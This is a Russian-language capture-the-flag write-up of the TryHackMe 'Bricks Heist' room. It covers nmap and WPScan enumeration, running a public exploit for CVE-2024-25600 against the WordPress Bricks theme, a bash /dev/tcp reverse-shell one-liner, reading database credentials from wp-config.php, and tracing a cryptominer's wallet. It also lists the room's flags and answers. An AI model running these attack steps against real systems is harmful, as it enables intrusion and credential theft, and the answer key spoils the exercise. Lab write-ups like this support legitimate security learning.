TryHackMe -TryHack3M: Bricks Heist Write-up

Мой первый write-up, раньше писал заметки только для себя. Специально выбрал машину уровня Easy просто чтобы попробовать. Надеюсь будет полезно.

Не будем тратить время на описание, прыгнем с места в карьер.

Все ответы и флаги будут одним списком в самом конце.

Добавляем в /etc/hosts

10.10.34.203 bricks.thm - у вас будет свой ip адрес

Выполняем сканирование, флаг -A включает расширенное сканирование с определением ОС, версий сервисов, использованием скриптов и трассировку до ресурса

nmap -A 10.10.34.203

Видим следующие открытые порты
80http server
443 на нем запущен Apache с WordPress 6.5
3306MySQL (нужна аутентификация)
/wp-admin/ в выводе снова намекает на wordpress

Начнем с WordPress Enumeration с помощью утилиты WPScan, она предназначена для поиска слабых мест в движке WordPress, его плагинах, темах и конфигурации

wpscan --url https://bricks.thm

Видим ошибку и немного правим, опция disable-tls-checks полезна, когда у сайта самоподписанный сертификат

wpscan --url https://bricks.thm --disable-tls-checks

Смотрим вывод и после небольшого исследования понимаем, что можем что-то придумать с темой — ищем в гугле по типу wordpress bricks 1.9.5 exploit

По первой ссылке находим репозиторий, клонируем и запускаем

git clone https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT
cd exploit folder
ls
python3 CVE-2024-25600.py -u https://bricks.thm/

получаем shell

ls
видим файл много_цифр.txt
cat много_цифр.txt
видим наш флаг

Теперь улучшим наш shell, в одном окне запустим с помощью nc listener на порту 5555, а в окне shell полученном ранее с помощью эксплойта, запустим one liner reverse shell, который подключится к указанному адресу и порту

в новом окне делаем
nc -lvnp 5555

в shell полученном с помощью эксплойта делаем
bash -c 'exec bash -i &>/dev/tcp/[здесь твой ip]/[здесь твой порт] <&1'

На серьезных CTF нужно учиться подмечать все, до чего могут дотянуться наши шаловливые ручки. Например в директории с флагом мы видим wp-config.php и открыв его можем найти разные интересные данные, например DB_NAME, DB_PASSWORD и некоторые другие 🙂

Посмотрим список запущенных сервисов в системе

systemctl list-units -- type=service -- state=running

Внимательно просматриваем и видим намек. Это ответ на третий вопрос

Выведем содержимое найденного юнита

systemctl cat ubuntu.service

Это ответ на второй вопрос

Выше мы видим путь /lib/NetworkManager и скорее всего не просто так. Заглянем в него

cd /lib/NetworkManager

Изучаем директорию и находим файл inet.conf в выводе которого очень интересная информация. Похоже это оно.

Теперь найдем в нем wallet address, выведем первые 20 строк файла

head -n 20 inet.conf

Видим, что строка обфусцирована и применим CyberChef чтобы декодировать ее

https://gchq.github.io/CyberChef

Получаем 2 биткойн кошелька, теперь нужно понять какой из них настоящий, идем на сайт

https://www.blockchain.com/explorer

Видим что это он

Теперь ищем ответ на последний вопрос. Я ориентировался на крупные переводы и по одному из них нашел следующее

Гуглим, проходим по ссылке и видим, что речь шла о LockBit

Итоговый список ответов на вопросы

What is the content of the hidden .txt file in the web folder?
THM{fl46_650c844110baced87e1606453b93f22a}

What is the name of the suspicious process?
nm-inet-dialog

What is the service name affiliated with the suspicious process?
ubuntu.service

What is the log file name of the miner instance?
inet.conf

What is the wallet address of the miner instance?
bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa

The wallet address used has been involved in transactions between wallets belonging to which threat group?
LockBit

Надеюсь было полезно. Удачи на THM